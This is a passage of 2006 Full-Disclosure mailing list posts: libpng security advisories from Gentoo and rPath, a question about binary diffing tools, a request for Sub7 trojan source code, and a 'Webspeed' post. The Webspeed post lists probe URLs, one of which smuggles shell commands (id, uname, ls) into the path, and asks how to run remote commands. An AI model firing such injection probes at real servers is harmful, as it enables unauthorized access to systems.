latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-libs/libpng-1.2.12 All AMD64 emul-linux-x86-baselibs users should also upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-emulation/emul-linux-x86-baselibs-2.5.1 References == [ 1 ] libpng Changelog http://heanet.dl.sourceforge.net/sourceforge/libpng/libpng-1.2.12-README.txt [ 2 ] CVE-2006-3334 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200607-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bindiffing Patches
Does someone know about a non-commercial tool to perform binary diffing over patches? Something like SABRE BinDiff, but free? Regards, IvaN! Send instant messages to your online friends http://au.messenger.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bindiffing Patches
Hello Ivan, Wednesday, July 19, 2006, 9:45:28 PM, you wrote: Does someone know about a non-commercial tool to perform binary diffing over patches? Something like SABRE BinDiff, but free? Regards, IvaN! Send instant messages to your online friends http://au.messenger.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ hope I'm not off-topic :D did you have a look at iDefense's IDACompare? -- Best regards, Alexandrumailto:[EMAIL PROTECTED] -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://www.bitdefender.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2006-0133-1 libpng
rPath Security Advisory: 2006-0133-1 Published: 2006-07-19 Products: rPath Linux 1 Rating: Major Exposure Level Classification: User Non-deterministic Unauthorized Access Updated Versions: libpng=/[EMAIL PROTECTED]:devel//1/1.2.12-2-0.1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334 https://issues.rpath.com/browse/RPL-517 Description: Previous versions of the libpng package contain a weakness in processing images that is known to create a denial of service vulnerability and is expected also to allow unauthorized access. This weakness is triggered by malformed png images that may be provided to applications such as web browsers by an attacker. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sub7 Source code
Hi,I've been looking for sub7's source code to have a play with, but I haven't been able to find it. Any version will do, but the 1.5 or 2.2 source would be preferable. A link to its source, or even an attachment of it would be greatly appreciated. Thank you, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] anoNet: Cooperative Chaos
Hrm, that's strange that the website is down. I don't run it. Here is another address. This works as of today, July 19, 2006. http://anonetnfo.brinkster.net guant -- ___ Get your free email from http://www.hackermail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Webspeed remote testing tips?
Alo, does anyone have more info about webspeed vulnerabilities ? or howto execute remote commands?does anyone have glosary about msgs errors o services?I tried: (1) http://server/cgi-bin/anyfile.sh/WService=anything?WSMadminMessenger: Internal command access denied. (6368)(2) http://server/cgi-bin/anyfile.sh/|id;uname;ls ;Messenger: URL contains invalid syntax. (6369)(3) http://server/cgi-bin/wspd_cgi.sh?Msngr: the specified service name does not exist or has a bad format. (5825): wsbroker1 wsbroker1? what services we can execute ?(4) http://server/scripts/wsisa.dll/WService=anything?WSMadmin - for win32 (not successful) (5) http://server/scripts/wsnsa.dll/WService=anything?WSMadmin - for Unix (not successful)regards- Mark :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
